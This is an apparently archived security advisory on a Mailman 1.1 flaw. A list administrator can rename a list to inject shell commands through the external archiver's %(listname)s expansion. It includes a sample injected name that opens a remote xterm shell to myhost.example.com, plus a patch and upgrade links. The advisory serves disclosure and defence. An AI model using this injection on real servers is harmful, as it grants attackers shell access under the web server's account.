COMMAND
Mailman
SYSTEMS AFFECTED
Mailman 1.1 and prior with external archiving enabled
PROBLEM
Christopher P. Lindsey found following. Mailman from www.list.org
is a mailing list manager with strong Web functionality. If a
site is running Mailman 1.1 with an external archiving mechanism
that uses the internal variable %(listname)s, list administrators
can run any command with the Webserver's uid/gid.
This bug was reported to the developers in late November, 1999,
and was fixed in the CVS source tree. Newer beta versions of
Mailman are not susceptible, yet it has recently come to
attention that the vulnerable 1.1 package is still available as a
stable, non-beta release on the Mailman site(s).
Mailman has a mechanism that allows messages sent to a mailing
list to be pumped into some sort of external program.
Traditionally this involves some sort of Web-based archiver like
MHonArc or hypermail. To make the archiving more powerful,
macros can be used based on internal Mailman values. For
example, list archives can be saved on a per list basis with this
line in $prefix/Mailman/mm_cfg.py:
PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'
The problem comes from the %(listname)s expansion. Since it's
derived from a value that can be set on a per list basis by the
list administrator, it's subject to tampering. Consider a list
who's name was changed to
/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh
by a list administrator. As soon as a message is sent to the list
this command will be executed, opening a remote xterm with a shell
running with the Web server's uid/gid. Any command available to
the Web server can be executed in this fashion.
Other variable names can be accessed if your
PUBLIC_EXTERNAL_ARCHIVER definition is configured to use them.
The patch below will only fix problems with %(listname)s
expansion.
SOLUTION
Upgrade to a later version of Mailman, or install the supplied
patch.
This patch was provided my the Mailman developers and later
cleaned up to work against a stock 1.1 distribution. It works by
only allowing listowners to change case values within the name of
their list. Obviously a better long-term solution that sanitizes
system calls, etc. should be considered.
*** admin.py.bak Mon Mar 13 21:03:53 2000
--- admin.py Mon Mar 13 21:04:51 2000
***************
*** 784,789 ****
--- 784,800 ----
val = cgi_info[property].value
value = GetValidValue(lst, property, kind, val, deps)
if getattr(lst, property) != value:
+ # TBD: Ensure that lst.real_name differs only in letter
+ # case. Otherwise a security hole can potentially be opened
+ # when using an external archiver. This seems ad-hoc and
+ # could use a more general security policy.
+ if property == 'real_name' and \
+ string.lower(value) <> string.lower(lst._internal_name):
+ # then don't install this value.
+ document.AddItem("""<p><b>real_name</b> attribute not
+ changed! It must differ from the list's name by case
+ only.<p>""")
+ continue
setattr(lst, property, value)
dirty = 1
#
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/mailman-2.0b5.tgz